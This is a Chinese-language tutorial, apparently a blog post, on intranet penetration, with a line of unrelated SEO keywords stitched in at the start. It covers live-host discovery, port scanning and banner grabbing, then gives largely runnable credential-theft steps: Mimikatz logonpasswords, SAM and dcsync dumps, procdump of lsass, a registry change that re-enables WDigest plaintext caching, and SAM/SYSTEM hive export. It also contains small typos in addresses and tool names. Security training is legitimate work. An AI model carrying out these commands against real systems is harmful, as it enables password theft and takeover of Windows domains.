做网站分为哪几个岗位,广州市市场监督管理局,东莞家政网站建设,网站公司做的比较好内网资源探测
在内网渗透中#xff0c;测试人员往往需要通过各种内网扫描技术来探测内网资源的情况#xff0c;为后续的横向渗透做准备#xff0c;通常需要发现内网存活的主机#xff0c;并探测主机的操作系统、主机开放了哪些端口、端口上运行了哪些服务、服务的当前版本…内网资源探测
在内网渗透中测试人员往往需要通过各种内网扫描技术来探测内网资源的情况为后续的横向渗透做准备通常需要发现内网存活的主机并探测主机的操作系统、主机开放了哪些端口、端口上运行了哪些服务、服务的当前版本是否存在已知漏洞等信息。这些信息可以帮助测试人员发现内网的薄弱资源确定后续的攻击方向。
发现内网存活主机
基于ICMP发现存活主机
可以使用ICMP循环对整个网段中的每个IP地址执行ping命令所以能够ping通的ip地址即为内网中存活的主机。
for /L %I in (1,1,254) DO ping -w 1 -n 1 192.168.52.%I |findstr TTL说明该局域网C段存活三台主机。
基于NetBIOS网络基本输入/输出系统协议发现存活主机
NetBIOS提供OSI/RM的会话层在TCP/IP模型中包含在应用层中服务让不同计算机上运行的不同程序可以在局域网中互相连接和共享数据。严格来说NetBIOS不是一种协议而是一种应用程序接口(Application Program Interface,API)。几乎所有局域网都是在NetBIOS协议的基础上工作的操作系统可以利用WTNS服务、广播、Lmhost文件等模式将NetBIOS名解析为相应的IP地址。NetBIOS的工作流程就是正常的机器名解析、查询、应答的过程。在Windows中默认安装TCP/IP后会自动安装NetBIOS。
在实际利用时向局域网的每个IP地址发送NetBIOS状态查询可以获得主机名、MAC地址等信息。NBTScan是一款用于扫描Windows网络上NetBIOS名称的程序用于发现内网中存活的Windows主机。NBTScan可以对给定IP范围内的每个IP地址发送NetBIOS状态查询并且以易读的表格列出接收到的信息对于每个响应的主机会列出它的P地址、NetBIOS计算机名、登录用户名和MAC地址。
下载链接nbtscan下载
将nbscan.exe上传到目标主机执行以下命令
nbscan.exe 192.168.52.1/24基于UDP发现存活主机
在实际利用中可以将一个空的UDP报文发送到目标主机的特定端口如果目标主机的端口是关闭的UDP探测就马上得到一个ICMP端口无法到达的回应报文这意味着该主机正在运行。如果到达一个开放的端口大部分服务仅仅忽略这个空报文而不做任何回应。
Unicornscan是Kali Linux平台的一款信息收集工具提供了网络扫描功能。执行以下命令通过UDP协议扫描内网的存活主机。
unicornscan -mU 192.168.52.0/24基于ARP发现存活主机
ARP(Address Resolution Protocol,地址解析协议)是一个通过解析网络层地址来找寻数据链路层地址的网络传输协议用于网络层通信。主机发送信息时将包含目标IP地址的ARP请求广播到局域网上的所有主机并接收返回消息以此确定目标的物理地址收到返回消息后将该P地址和物理地址存入本机ARP缓存并保留一定时间下次请求时直接查询ARP缓存以节约资源。
在实际利用中可以向网络发送一个ARP请求若目标主机处于活跃状态则其一定会回应一个ARP响应否则不会做出任何回应。
1、ARP-Scan的使用
ARP-Scan是一款快速、便捷的内网扫描工具利用ARP发现内网中存活的主机。将工具上传到目标主机。
项目https://github.com/QbsuranAlang/arp-scan-windows-/tree/master/arp-scan
执行以下命令即可扫描内网中存活的主机。
arp-scan.exe -t 192.168.52.0/242、PowerShell的利用
脚本地址git/Invoke-ARPScan.ps1 at master · sinmygit/git · GitHub
Empire渗透框架的Invoke-ARPScan.psl脚本可利用ARP发现内网存活主机。使用时需要将脚本导入执行
Import-Module .\Invoke-ARPScan.ps1
Invoke-ARPScan -CIDR 192.168.52.0/24发现无法执行脚本以管理员的身份打开powershell。执行以下命令
set-ExecutionPolicy RemoteSigned更改策略之后就不会报错了。 基于SMBServer Message Block,服务器消息块)协议发现存活主机
SMB又称为网络文件共享系统(Common Internet File System,CIFS)协议是一种应用层传输协议主要功能是使网络上的机器能够共享计算机文件、打印机、串行端口和通信等资源。CIFS消息一般使用NetBIOS或TCP发送分别使用139或445端口目前倾向于使用445端口。
在实际利用中可以探测局域网中存在的SMB服务从而发现更多的存活主机。多用于windows主机的发现。
CrackMapExec简称CME)是一款十分强大的后渗透利用工具在Kali Linux上可以直接使用apt-get命令进行安装。CrackMapExec能够枚举登录用户、枚举SMB服务列表、执行WNRM攻击等功能可以帮助测试人员自动化评估大型域网络的安全性。执行以下命令
crackmapexec smb 193.168.52.0/24探测局域网中存在的SMB服务从而发现内网中的存活主机。 内网端口扫描
1、使用telnet探测端口
Telnet是进行远程登录的标准协议和主要方式为用户提供了在本地计算机上完成远程主机工作的能力。telnet命令可以简单测试指定的端口号是正常打开还是关闭状态。
telnet IP Port像这种就是说明对应的端口是开放的。
2、使用nmap进行端口扫描
扫描指定端口
nmap -p Port ip
eg:nmap -p 80,88,135,139,443,8080,3306,3389 192.168.52.138扫描目标主机全部开发端口
nmap -p 1-65535 -sS 192.168.52.138利用MetaSploit探测内网 获取端口Banner信息
Banner中可能包含一些敏感信息。通过查看端口的Banner,测试人员往往可以获取软件开发商、软件名称、服务类型、版本号等信息根据不同的服务可以制订不同的攻击方案而服务的版本号有时会存在公开的漏洞可以被利用。
1、利用Netcatnc获取端口Banner
通过指定netcat的“nv”选项可以在连接指定的端口时获取该端口的Banner信息。
nc -nv ip port我这里的是没有这个提示但是有些端口可能会有。
2、利用Telnet获取端口Banner
如果端口开放使用telnet连接后也会返回相应的Banner信息。
telnet IP Port3、利用nmap获取端口Banner
在nmap中指定脚本“–scriptbanner”可以在端口扫描过程中获取端口的Banner信息。
nmap --scriptbanner -p ports IP用户凭据收集
当测试人员获取某台机器后会以被攻陷的主机为跳板进行横向渗透进一步扩大所掌控的资源范围。但是横向渗透中的很多攻击都需要先获取到域内用户的密码或者哈希值才能进行如哈希传递攻击、票据传递攻击等。所以在进行信息收集时要尽可能收集域内用户的登录凭据等信息。
获取域内单机密码和哈希值
SAM文件是什么lsass.exe系统进程的作用
在Windows中**SAM文件是Windows用户的账户数据库位于系统的%SystemRoot%\System3\Config目录中所有本地用户的用户名、密码哈希值等信息都存储在这个文件中。**用户输入密码登录时用户输入的明文密码被转换为哈希值然后与SAM文件中的哈希值对比若相同则认证成功。**lsass.exe是Windows的一个系统进程用于实现系统的安全机制主要用于本地安全和登录策略。**在通常情况下用户输入密码登录后登录的域名、用户名和登录凭据等信息会存储在lsass.exe的进程空间中用户的明文密码经过WDigest和Tspkg模块调用后会对其使用可逆的算法进行加密并存储在内存中。
用于获取主机的用户密码和哈希值的工具大多都是通过多去SAM文件或者访问lsass.exe进程的内存数据等操作实现的。这些操作大多都需要管理员权限意味着需要配合一些提权操作。
Mimikatz工具的使用
Mimikatz是一款功能强大的凭据转储开源程序可以帮助测试人员提升进程权限、注入进程、读取进程内存等广泛用于内网渗透测试领域
项目地址https://github.com/gentilkiwi/mimikatz/
Mimikatz使用教程
privilege(提权相关模块)
attentionprivilege::debug进入mimikatz命令交互界面的首要操作也是最基本的操作。
privilege::security //调整为安全权限
privilege::restore //恢复原来权限
privilege::sysenv //调整为系统环境权限
privilege::driver //调整为装载驱动权限sekurlsa与用户凭证相关的模块可以从lsass进程中提取passwords、keys、tickets等信息
sekurlsa::msv //读取用户对应密码的各种加密协议的密文(NTML、SHA1等)低版本windows可以读取为明文
sekurlsa::wdigest //wdigest凭证运用程序漏洞可逆的手法去读取密码明文
sekurlsa::tspkg //tspkg凭证sekurlsa::logonpasswords //常用并重点使用直接集成上面多条指令功能读取用户各种凭证和信息。sekurlsa::tickets //列出kerberos中的票据
sekurlsa::tickets /export //导出票据#下面两条命令结合使用可以将转储的lsass进程为lsass.dmp文件离线读取内存信息
sekurlsa::minidump filename或lsass.dump //加载对应文件(lsass.dump)
sekurlsa::logonPasswords full //读取文件信息kerberos 协议相关模块常用于 黄金/白银票据
kerberos::list //列出系统中的所有票据
kerberos::purge //清除系统中的票据
kerberos::ptt //pass-the-ticket票据传递攻击内网横移操作
kerberos::golden //伪造黄金和白银票据使用具体构造方法不相同kerberos::ptc //票据路径
kerberos::ptc 票据名 //导入票据
process(进程模块)
process::list //列出进程列表
process::exports //导出进程列表
process::start //开始一个进程
process::stop //停止一个进程service(服务管理模块)
service::start //开始服务。
service::remove //移除服务。
service::stop //停止服务。
service::suspend //暂停服务。
service::resume //恢复服务。
service::preshutdown //关闭服务。
service::shutdown //关闭服务。
service::list //列出服务。lsadump对域控操作模块
Lsadump::secrets //从registry获取保存的密码凭据可以直接获取明文密码。
lsadump::lsa /patch //读取所有用户的哈希
lsadump::sam //sam表获取Hash
lsadump::dcsync //通过dcsync利用目录复制服务DRS从NTDS.DIT文件中拿到密码哈希值在域控权限下获取
lsadump::dcsync /domain:xxxx.com /user:xxxx //查看域内指定用户信息包括NTLM哈希等
lsadump::dcsync /domain:xxxx.com /all /csv //查看所有域用户1、在线读取lsass进程内存
上传mimikatz.exe到目标主机之后。
mimikatz.exe privilege::debug sekurlsa::logonpasswords full exit 2、离线读取lsass内存文件
mimikatz无法上传到目标主机可以使用Procdump工具进行进程离线存储成dmp文件。
项目地址https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
首先在目标主机上传Prodump程序(微软的不会杀掉)执行以下命令
procdump.exe -accepteula -ma lsass.exe lsass.dmp然后在攻击机上执行一下命令
mimikatz.exe sekurlsa::minidump lsass.dmp sekurlsa::logonpasswords full exit注意微软在2014年5月发布了KB2871997补丁关闭了WDigest功能禁止从内存中获取明文密码且Windows Server20l2及以上版本默认关闭WDigest功能。但是测试人员通过修改注册表可以重新开启WDigest功能。当用户注销或者重新登录后就可以重新获取到用户的明文密码。
开启WDigest
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f关闭WDigest
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f在线读取本地SAM文件
将mimikatz.exe上传到目标主机后执行以下命令
mimikatz.exe privilege::debug token::elevate lsadump::sam exittoken::elevate------------用于提升至SYSTEM权限
读取SAM文件中保存的用户登录凭据可以导出当前系统重所有本地用户的哈希值。 离线读取本地的SAM文件
离线读取就是将SAM文件导出使用Mimikatz加载并读取其中的用户登录凭据等信息。注意为了提高SAM文件的安全性以防止离线破解Windows会对SAM文件使用密钥进行加密这个密钥存储在SYSTEM文件中与SAM文件位于相同目录下。
在目标主机上导出SAM和SYSTEM两个文件。因为系统在运行时这两个文件是被锁定的所以需要借助一些工具来实现而PowerSploit项目中提供的Invoke-NinjaCopy.ps1脚本可以完成这项工作。
脚本地址PowerSploit/Exfiltration/Invoke-NinjaCopy.ps1 at master · PowerShellMafia/PowerSploit · GitHub
Invoke-NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination C:\Temp\SAM也可以在管理员权限下执行命令通过保存注册表的方式导出
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive然后将导出的SAM和SYSTEM文件复制到本地使用Mimikatz加载并读取SAM中的用户凭据信息
mimikatz.exe lsadump::sam /sam:sam.hive /system:system.hive exit
